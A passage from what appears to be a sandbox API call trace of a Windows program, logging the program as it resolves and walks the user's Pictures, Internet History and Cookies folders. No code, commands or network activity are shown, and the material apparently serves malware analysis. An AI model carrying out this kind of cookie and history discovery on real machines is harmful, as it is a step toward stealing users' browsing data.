Files") returned 1 [0127.849] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files", psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0127.850] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0127.850] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files") returned 1 [0127.851] SysReAllocStringLen (in: pbstr=0x28fe00*=0x0, psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fe00*="c:\\Program Files (x86)\\Common Files") returned 1 [0127.851] SysReAllocStringLen (in: pbstr=0x3370074*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x3370074*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0127.851] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0127.852] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures", cchLength=0x1b | out: lpsz="c:\\users\\keecfmwgj\\pictures") returned 0x1b [0127.852] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj\\pictures", len=0x1b | out: pbstr=0x337009c*="c:\\users\\keecfmwgj\\pictures") returned 1 [0127.852] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.853] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.853] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.853] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="pictures", len=0x8 | out: pbstr=0x33700e0*="pictures") returned 1 [0127.854] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.854] SysReAllocStringLen (in: pbstr=0x28fdf0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdf0*="c:\\") returned 1 [0127.854] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.854] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.854] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.854] GetLastError () returned 0x12 [0127.854] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.855] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.855] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdf0*="c:\\Users\\") returned 1 [0127.855] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.855] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.855] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.856] GetLastError () returned 0x12 [0127.856] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.856] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.856] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.856] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="pictures", len=0x8 | out: pbstr=0x28fae8*="pictures") returned 1 [0127.856] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\pictures" (normalized: "c:\\users\\keecfmwgj\\pictures"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0x114f2c0 [0127.857] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0 [0127.857] GetLastError () returned 0x12 [0127.857] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.857] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0127.857] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures", psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0127.858] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0127.858] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0127.859] SysReAllocStringLen (in: pbstr=0x28fdf4*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf4*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0127.859] SysReAllocStringLen (in: pbstr=0x3370078*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x3370078*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0127.859] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0127.860] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", cchLength=0x3a | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 0x3a [0127.860] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history", len=0x3a | out: pbstr=0x337009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 1 [0127.860] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.861] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.861] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.861] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33700e0*="appdata") returned 1 [0127.862] SysReAllocStringLen (in: pbstr=0x33700ec*=0x0, psz="local", len=0x5 | out: pbstr=0x33700ec*="local") returned 1 [0127.862] SysReAllocStringLen (in: pbstr=0x33700f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x33700f8*="microsoft") returned 1 [0127.863] SysReAllocStringLen (in: pbstr=0x3370128*=0x0, psz="windows", len=0x7 | out: pbstr=0x3370128*="windows") returned 1 [0127.863] SysReAllocStringLen (in: pbstr=0x3370134*=0x0, psz="history", len=0x7 | out: pbstr=0x3370134*="history") returned 1 [0127.863] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.863] SysReAllocStringLen (in: pbstr=0x28fde4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fde4*="c:\\") returned 1 [0127.863] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.864] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.864] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.864] GetLastError () returned 0x12 [0127.864] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.864] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.865] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fde4*="c:\\Users\\") returned 1 [0127.865] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.865] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.865] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.865] GetLastError () returned 0x12 [0127.865] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.866] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.866] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.866] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0127.866] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x114f2c0 [0127.866] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0127.866] GetLastError () returned 0x12 [0127.866] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.867] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0127.867] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0127.867] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0127.867] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x114f2c0 [0127.867] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0127.868] GetLastError () returned 0x12 [0127.868] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.868] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0127.868] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0127.868] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0127.868] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x114f2c0 [0127.869] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0127.869] GetLastError () returned 0x12 [0127.869] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.869] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", len=0x2a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft") returned 1 [0127.869] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", len=0x2b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\") returned 1 [0127.869] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0127.870] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x114f2c0 [0127.870] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0127.870] GetLastError () returned 0x12 [0127.870] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.870] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", len=0x32 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows") returned 1 [0127.870] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", len=0x33 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\") returned 1 [0127.870] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="history", len=0x7 | out: pbstr=0x28fae8*="history") returned 1 [0127.871] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\history" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0x114f2c0 [0127.871] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0 [0127.871] GetLastError () returned 0x12 [0127.871] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.871] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0127.872] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0127.873] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0127.874] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0127.874] SysReAllocStringLen (in: pbstr=0x28fde8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fde8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0127.874] SysReAllocStringLen (in: pbstr=0x337007c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x337007c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0127.874] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0127.875] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", cchLength=0x3c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 0x3c [0127.875] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies", len=0x3c | out: pbstr=0x337009c*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 1 [0127.875] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.875] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.875] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.875] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33700e0*="appdata") returned 1 [0127.876] 